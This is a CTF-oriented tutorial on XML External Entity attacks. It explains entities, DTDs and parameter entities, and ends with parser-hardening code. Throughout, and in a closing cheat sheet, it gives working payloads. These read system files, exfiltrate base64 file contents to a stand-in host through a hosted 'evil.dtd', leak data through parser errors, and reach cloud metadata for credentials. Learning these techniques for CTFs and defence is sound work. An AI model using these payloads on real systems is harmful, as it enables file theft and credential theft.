XXE for CTF: XML External Entity Attacks

You found an XML endpoint. Here is the payload.

The form submits XML. The API accepts Content-Type: application/xml. The SOAP service, the SAML login, the SVG upload, the RSS importer, the office-document parser, all of them eat XML on the way in. The moment a server parses XML you control, you can usually make its parser open files for you. That is XXE (XML External Entity injection), and the canonical first move is to read /etc/passwd and see it reflected straight back in the response.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

Send it where the application expects its XML. If any field of the response echoes the parsed value, you will see the contents of /etc/passwd sitting where &xxe; used to be. With curl:

curl -s https://target/api/parse \
  -H 'Content-Type: application/xml' \
  --data-binary @payload.xml

That is the whole trick in its simplest form. The rest of this guide is what to do when it is not that simple: when the response shows nothing, when the file you want has < characters that break the parse, when there is no XML field echoed but the parser can still make outbound requests, and when the only thing leaking is an error message. Each of those has a known payload. We will build up from the easy case to the blind case.

Note: XXE is cataloged as CWE-611 (Improper Restriction of XML External Entity Reference). If you have not done the file-read primitive before, the LFI for CTF guide covers the same read-a-file goal through a different door, and many of the target files overlap.

What are XML entities and DTDs, and why do they leak files?

XML has a built-in macro system. An entity is a named placeholder that the parser expands when it reads the document. You have already used the built-in ones: < expands to a less-than sign, & expands to an ampersand. You can also define your own. A Document Type Definition (DTD), declared in the <!DOCTYPE ...> block at the top of a document, is where custom entities live.

A plain internal entity is just text substitution:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY company "Initech">
]>
<note>&company; ships on Friday.</note>

The parser replaces &company; with Initech. Harmless. The danger is the keyword SYSTEM, which turns an entity into an external entity. Instead of inline text, the entity value becomes a URI that the parser dereferences:

<!ENTITY xxe SYSTEM "file:///etc/hostname">
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY xxe SYSTEM "expect://id">       <!-- needs PHP expect:// wrapper -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">

When the document later references &xxe;, the parser fetches whatever the URI points at and splices the bytes into the document. A misconfigured XML library will happily resolve file://, http://, and on PHP the various stream wrappers. The vulnerability is not in the XML syntax. It is that the default parser settings on many platforms leave external entity resolution turned on.

XXE is not a parsing bug. It is the parser doing exactly what the spec allows, against input the developer never imagined would define its own entities.

Two ingredients have to line up for the classic attack. First, you must be able to inject a <!DOCTYPE> with your own entity declaration (or the document already has a DTD you can extend). Second, the parser must have external entity resolution enabled. When both hold, you have an arbitrary file read at minimum and often a Server-Side Request Forgery primitive on top of it.

How do I read a file when the response is reflected?

The easiest target is one that takes XML, parses out a field, and renders that field back to you. A product-lookup endpoint, a contact form that echoes your name, an XML profile importer that shows a preview. Anywhere the parsed text reappears in the response, you have a reflected channel. Define the external entity, reference it inside the field that gets echoed:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

If the app reports something like "Product root:x:0:0:root:/root:/bin/bash ...not found," you have won the reflected case. Common files worth pulling in a CTF, in rough order of payoff:

file:///etc/passwd                 # users, confirms read works
file:///etc/hostname               # container name hints
file:///proc/self/environ          # env vars, sometimes the flag or secrets
file:///proc/self/cmdline          # how the app was launched
file:///app/flag.txt               # the obvious one, try several paths
file:///var/www/html/config.php    # DB creds (but see the next callout)
file:///proc/self/cwd/flag.txt     # flag relative to the working directory

Warning: Reflected file read breaks on two things. Multi-line files can survive, but a file containing XML metacharacters like <, >, or & (think a PHP config full of <?php) will make the parser choke when it tries to splice those bytes into the document. The fix is to read the file through a wrapper that encodes it first, or to switch to the out-of-band technique below. On PHP, base64-encode it at the source: php://filter/convert.base64-encode/resource=/var/www/config.php.

One more reflected trick: if the app blocks file:// but the underlying parser supports it, php://filter chains let you read and transform source code without ever tripping the metacharacter problem. Decode the base64 you get back and you have the source. That overlaps heavily with the wrapper tricks in the LFI for CTF guide, which is worth reading alongside this one because the file-targeting instincts transfer directly.

What if the response shows nothing? Out-of-band exfiltration.

Most modern XXE is blind. The parser resolves your entity but the result never appears in the response, so reflection gives you nothing. You confirm the vulnerability and exfiltrate data by making the parser talk to a server you control. This is out-of-band (OOB) XXE, and it needs a collaborator: any host on the internet that logs the requests it receives. A throwaway VPS running a one-line web server, an nc -lvnp 80 listener, or a request-logging service all work.

First, just prove the parser can reach out. Point an external entity at your box and watch your log:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY callhome SYSTEM "http://YOUR-SERVER:8000/ping">
]>
<data>&callhome;</data>

# on your collaborator box, log every incoming request
python3 -m http.server 8000
# a hit on /ping confirms blind, OOB-capable XXE
10.0.0.5 - - [21/Jun/2026 12:01:44] "GET /ping HTTP/1.1" 200

A hit means the parser does outbound HTTP. Now exfiltrate a file. You cannot put the file contents directly into a URL with a simple external entity, because XML forbids an entity reference inside another entity declaration in the internal subset. The standard workaround is an external DTD hosted on your server that uses parameter entities (covered in full two sections down). The malicious DTD reads the file, then builds a URL containing the file contents and forces a fetch to your box:

<!-- evil.dtd, hosted at http://YOUR-SERVER:8000/evil.dtd -->
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'http://YOUR-SERVER:8000/leak?d=%file;'>">
%wrap;

The target document just pulls in that DTD and triggers the chain:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://YOUR-SERVER:8000/evil.dtd">
  %dtd;
  %send;
]>
<data>anything</data>

Read it in order: the target loads your external DTD; the DTD reads the target file into the parameter entity %file; %wrap defines a new entity %send whose URL embeds %file; invoking %send makes the parser request http://YOUR-SERVER:8000/leak?d=BASE64_OF_THE_FILE. The file lands in your access log as a query string. The base64 wrapper sidesteps the metacharacter problem entirely, which is why OOB is the reliable move for config files and source.

Tip: Base64-encode the exfiltrated data at the source whenever possible. Newlines, ampersands, and reserved URL characters in the raw file will silently truncate or corrupt the fetched URL. php://filter/convert.base64-encode/resource=... on PHP targets or wrapping the value before it hits the URL keeps the leak intact. Decode the query string you receive with base64 -d.

For the workflow of standing up a collaborator and watching traffic land, the SSRF for CTF guide covers the exact same out-of-band confirmation loop, and Burp Suite for CTF walks through using Burp Collaborator if you would rather not run your own listener.

Can XXE reach internal services? XXE as an SSRF gun.

An external entity that resolves an http://URL is, by definition, a server-side request. The XML parser is now your proxy into the target's internal network. That makes XXE one of the cleanest ways to land an SSRF, and the two vulnerability classes blur together here. Instead of pointing at your own box, point at something the server can reach but you cannot:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

The high-value targets are the same ones any SSRF chases. Cloud instance metadata services hand out temporary credentials to anyone who can make the box ask for them:

http://169.254.169.254/latest/meta-data/                 # AWS IMDSv1
http://169.254.169.254/latest/meta-data/iam/security-credentials/  # AWS keys
http://metadata.google.internal/computeMetadata/v1/      # GCP (needs a header)
http://127.0.0.1:8080/admin                              # internal-only admin panel
http://localhost:6379/                                   # poke at Redis, etc.

If the XXE is reflected, AWS IMDSv1 credentials come straight back in the response. If it is blind, route the response through the OOB DTD from the previous section to exfiltrate what the internal endpoint returned. Either way, a parser that does outbound HTTP is an SSRF you reach through XML rather than through a URL parameter.

Note: GCP and AWS IMDSv2 require request headers (for example Metadata-Flavor: Google), which a bare external entity cannot set. That is a real limitation of XXE-to-SSRF: you control the URL but not the headers. When a target needs custom headers, fall back to a dedicated SSRF primitive that can. The SSRF for CTF guide covers metadata-service attacks, header smuggling, and the redirect tricks that get around exactly this.

What if I only see error messages? Error-based leaks.

Sometimes there is no reflected field and no outbound network access (egress filtering blocks your collaborator), but the application is kind enough to show you parser error messages. You can weaponize the error text itself. The idea: make the parser try to use the file contents as part of a path or URI it cannot resolve, so the resulting error message quotes the file contents back at you.

This still uses an external DTD, but the final entity points at a deliberately invalid local path built from the file you read:

<!-- evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

When the parser tries to open file:///nonexistent/root:x:0:0:..., it fails and emits an error like java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root.... The file contents ride along inside the exception string. You read the flag out of the error page. The same load-the-DTD-then-invoke pattern drives the target document:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://YOUR-SERVER:8000/evil.dtd">
  %dtd;
]>
<data>x</data>

Tip: Error-based XXE is single-line friendly but messy on multi-line files: the error often only quotes up to the first newline. For a one-line flag file it is perfect. For /etc/passwd you may only get the first line, which is still enough to prove the read. If egress is open at all, prefer the OOB exfiltration from the blind section.

If you cannot even host an external DTD because there is zero outbound access, a fully local variant exists on some parsers: you can sometimes reference an internal parameter entity defined inside the same DOCTYPE to trigger the error without fetching anything external. It is parser-dependent and worth trying when the box is completely walled off.

What are parameter entities, and why do the advanced payloads need them?

You have seen % show up in every out-of-band payload. That is a parameter entity, and understanding it is what turns the advanced XXE payloads from copy-paste into something you can adapt on the fly.

XML has two entity namespaces. A general entity is declared with <!ENTITY name ...> and referenced in the document body with &name;. A parameter entity is declared with an extra percent sign, <!ENTITY % name ...>, and referenced inside the DTD itself with %name;. The distinction matters because the XML spec forbids a general entity from referencing another entity within the internal DTD subset. Parameter entities do not have that restriction inside an external DTD, which is the loophole every blind and error-based payload rides on.

<!ENTITY      greet "hello">     <!-- general:   used as &greet; in the body -->
<!ENTITY %    file  SYSTEM "...">  <!-- parameter: used as %file; in the DTD -->

One more wrinkle you will hit constantly: nesting. To define an entity whose value contains a parameter-entity reference, you write the percent sign as its XML character reference % so it is not expanded too early. That is why the OOB DTD reads <!ENTITY % send SYSTEM '...'> instead of a literal %. The parser expands % to % at the right moment, declaring %send only after %file has already been filled in. Get the expansion order right and the rest of the chain falls into place.

General entities exfiltrate. Parameter entities are the plumbing that lets the file get into the entity in the first place. Almost every non-trivial XXE is a parameter-entity construction.

Key insight: The reason the malicious DTD lives on a remote server rather than inline is a real parser restriction: many parsers refuse to expand a parameter entity that is itself referenced inside the internal subset where it was declared. Hosting the dangerous declarations in an external DTD sidesteps that rule, which is exactly why blind XXE almost always involves a second file fetched from your collaborator box.

How is XXE actually fixed? (Know it to recognize it.)

Knowing the defense tells you instantly whether a target is exploitable, because every payload above depends on a default-on setting that one line of code disables. The authoritative guidance is short: turn off DTDs and external entities entirely.

The single most effective fix, recommended by the OWASP XXE Prevention Cheat Sheet, is to disallow DOCTYPE declarations completely. If the parser rejects any document that contains a <!DOCTYPE>, there is nowhere to declare an entity and the whole attack class evaporates:

// Java (the most common XXE target)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Python lxml: do not resolve entities or fetch network resources
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
// PHP libxml: disable external entity loading
libxml_set_external_entity_loader(null);
// (on libxml < 2.9, also: libxml_disable_entity_loader(true);)
// .NET
XmlReaderSettings s = new XmlReaderSettings();
s.DtdProcessing = DtdProcessing.Prohibit;

When you are attacking, this is your checklist in reverse. If a payload with a <!DOCTYPE>comes back with an error like "DOCTYPE is disallowed," the easy door is shut. If external entities resolve but the network is filtered, you are in error-based territory. If everything resolves and reflects, you have the full menu. The PortSwigger Web Security Academy XXE topic has free labs for each variant if you want a sandbox to drill on.

Warning: Do not stop at /etc/passwd when you report or exploit this for real. XXE that reaches cloud metadata or internal services is frequently a full account takeover, not just a file read. Treat any confirmed external-entity resolution as a pivot point, not an endpoint. The real-world web bug patterns post shows how file-read primitives chain into bigger compromises.

Quick reference

Triage order on any XML endpoint

Send the reflected file:///etc/passwd payload. If it echoes, you are done.
No echo? Send the http://YOUR-SERVER/ping callback. A log hit means blind, OOB-capable.
OOB confirmed? Host evil.dtd and exfiltrate base64 to your access log.
No egress but errors show? Use the error-based DTD to leak the file inside the exception.
Point an external entity at 169.254.169.254 for cloud creds and internal services.
DOCTYPE is disallowed? The parser is hardened. Move on.

Payload cheat sheet

# 1. Classic reflected file read
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>
# 2. Blind callback (confirm OOB)
<!DOCTYPE foo [ <!ENTITY x SYSTEM "http://ME:8000/p"> ]>
<data>&x;</data>
# 3. OOB exfil: target document
<!DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://ME:8000/evil.dtd"> %dtd; %send; ]>
<data>x</data>
# 3b. evil.dtd (parameter-entity exfil)
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'http://ME:8000/l?d=%file;'>">
%wrap;
# 4. Error-based: evil.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'file:///x/%file;'>">
%eval; %err;
# 5. XXE to SSRF / cloud metadata
<!DOCTYPE foo [ <!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<data>&x;</data>
# curl delivery
curl -s https://target/api -H 'Content-Type: application/xml' --data-binary @p.xml

If a server parses XML you can touch, assume it will open files for you until it proves otherwise, then make the parser do the reading.

picoCTF's dedicated XXE challenge is SOAP (2023), a SOAP endpoint that parses your XML body and reflects the result, so the classic file:///etc/passwd payload above reads the flag directly.

For the adjacent web primitives that XXE chains into, keep the SSRF, LFI, and command injection guides open in adjacent tabs. A file-read on a config file plus one of those is how a single XXE becomes a flag.